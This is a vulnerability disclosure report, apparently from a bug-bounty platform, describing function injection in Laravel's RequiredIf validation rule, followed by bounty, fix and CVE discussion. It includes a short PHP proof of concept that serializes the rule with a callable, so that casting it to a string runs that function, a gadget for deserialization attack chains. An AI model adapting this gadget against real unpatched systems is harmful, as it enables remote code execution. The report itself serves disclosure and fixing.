Code Injection in laravel/framework

Valid

Reported on

Jun 12th 2021

✍️ Description

Function injection in Illuminate\Validation\Rules\RequiredIf can be exploited to generate gadget chains for deserialization vulnerabiltiies.

🕵️‍♂️ Proof of Concept

<?php
use Illuminate\Validation\Rules\RequiredIf;

require("vendor/autoload.php");

$gadget = serialize(new RequiredIf("phpinfo"));

echo unserialize($gadget); // exploitation

As soon as the object is casted to string, function phpinfo gets executed.

💥 Impact

This vulnerability is capable of calling callables and can be utilized in POP gadget chains when exploiting deserialization vulnerabilities.

0xcrypto modified the report
2 years ago
0xcrypto submitted a
patch
2 years ago
Jamie Slome
2 years ago

Admin

@taylorotwell, can you just confirm that this report is valid?

Jamie Slome validated this vulnerability 2 years ago
0xcrypto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome marked this as fixed with commit 814d6b 2 years ago
0xcrypto has been awarded the fix bounty
This vulnerability will not receive a CVE
0xcrypto
10 months ago

Researcher

@jamieslome is it possible to get CVE on this one?

Jamie Slome
10 months ago

Admin

@0xcrypto - we would first require the go-ahead from the maintainer before assigning a CVE here 👍

to join this conversation